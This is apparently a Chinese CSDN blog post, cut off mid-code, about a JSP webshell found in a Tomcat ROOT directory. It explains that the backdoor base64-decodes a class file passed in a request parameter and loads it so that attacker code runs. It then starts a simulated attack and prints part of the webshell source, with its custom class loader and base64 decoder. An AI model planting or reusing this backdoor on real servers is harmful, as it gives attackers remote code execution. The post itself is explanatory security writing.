完了完了 我好像中奖了!(木马病毒)

本文通过一个实例展示了如何模拟Webshell攻击,从创建木马文件到利用Base64编码执行命令,同时强调了安全防范的重要性。阿里云给出了针对Webshell的告警,并提醒用户采取措施,如限制上传权限、定期更换密码和保持程序更新,以保护网站和服务器安全。
摘要由CSDN通过智能技术生成

描述

最近一个老同学跟我说他部署在阿里云上的系统,在tomcat的目录下出现了一个index.jsp文件,内容大致如下:

我一看发现这不就是一个木马后门文件吗,只需要通过参数ejiaogl传入一个经过base64编码的Class文件,这样就可以解码然后被类加载器加载,而我们知道类被加载的时候是可以执行static代码块的,而这个代码块可以任由攻击者来指定要执行的代码,是非常危险的,为了更加形象我特意做了一个模拟攻击。

模拟攻击

准备木马文件

准备一个Tomcat,直接启动即可,默认访问的是ROOT目录下的index.jsp,准备好以上的木马后门文件直接替换,文件如下:

<%!
//自定义了一个类加载器
class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }

    public Class g(byte[] b) {
        return this.defineClass(b, 0, b.length);
    }
}
​
public byte[] base64Decoder(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        //这里还做了一个base64的兼容处理
        Class clazz = Class.forName("java.util.Base64");
        Object decoder 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Java盘鱼宴

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值